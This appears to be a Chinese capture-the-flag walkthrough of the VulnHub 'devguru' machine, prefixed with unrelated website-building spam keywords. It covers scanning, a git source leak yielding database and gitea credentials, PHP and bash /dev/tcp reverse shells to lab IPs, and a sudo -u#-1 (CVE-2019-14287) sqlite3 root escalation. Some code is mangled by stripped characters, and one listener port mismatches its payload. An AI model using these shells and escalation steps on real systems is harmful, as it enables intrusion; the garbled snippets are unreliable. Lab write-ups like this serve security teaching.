网站建设首先,哈尔滨网站建设30t,微网站注意事项,免费咨询法律顾问vulnhub系列#xff1a;devguru
靶机下载
一、信息收集
nmap扫描存活#xff0c;根据mac地址寻找IP
nmap 192.168.23.0/24nmap扫描端口#xff0c;开放端口#xff1a;22、80、8585
nmap 192.168.23.147 -p- -sV -Pn -O访问80端口 dirb目录扫描#xff0c;存在 git 源…vulnhub系列devguru
靶机下载
一、信息收集
nmap扫描存活根据mac地址寻找IP
nmap 192.168.23.0/24nmap扫描端口开放端口22、80、8585
nmap 192.168.23.147 -p- -sV -Pn -O访问80端口 dirb目录扫描存在 git 源码、
dirb http://192.168.23.147/拼接发现数据库登录页面 发现登录页面 拼接/.git/config发现8585端口的路径 拼接是8585端口的页面 拼接/.git/description提示通过编辑 description 库来命名数据库 找不到其他东西扫一下 8585 端口的目录
搜索框 也没扫出什么东西看一下80端口的 git 源码泄露Githack 下载查看 源码中发现 mysql 账号密码 成功登录数据库 发现 frank 用户但是密码破解不出来直接添加一个用户 设置权限 添加用户后无法登录john 解码发现密码为 bcrypt 加密发现密码设置密码时需要选择 encrypt 修改后成功登录 二、getshell
在 cms - pages 可以写入语句这里我在 about 中写入语句
function onStart(){$sfsockopen(192.168.195.130,7777);$procproc_open(/bin/sh -i, array(0$s, 1$s, 2$s),$pipes);
}kali监听4444端口然后访问页面的about路径 成功反弹shell 三、提权
使用python提升交互性
python3 -c import pty;pty.spawn(/bin/bash)尝试提权失败/home 目录下有一个 frank 目录也没有权限进入
/var/backups 下发现 app.ini.pak查看内容 得到 gitea 账号密码
gitea:UfFPTF8C8jjxVF2m返回 adminer.php 页面登录 user 表下发现 frank 用户密码 bcrypt 加密 将密码修改为同样 bcrypt 加密的123456
https://www.bejson.com/encrypt/bcrpyt_encode/$2a$10$vVQiseY5ZaYAwCcbgXJRpOxOhqXtXfN2SvsjW3vG3AXWw3R.LESIe将密码修改 访问 8585端口的 /user/login 进行登录 登录后点击 在其中写入反弹 shell 语句
bash -c exec bash -i /dev/tcp/192.168.23.133/4444 01下方点击保存 kali 开启监听
nc -lvnp 4444返回前几个路径随便修改一个文件保存后即可反弹shell 在 /home/frank 下发现第一个 flag 文件 查看当前权限
sudo -l发现 sqlite3 命令能执行 root 权限执行命令
sudo sqlite3 /dev/null .shell /bin/sh提权失败百度搜了一下是由于 sudo 版本问题导致查看 sudo 版本
sudo -V又查了一下sudo 版本低于 1.8.27存在 CVE-2019-14287 漏洞执行命令提权成功
sudo -u#-1 sqlite3 /dev/null .shell /bin/sh在 /root 下发现第二个 flag
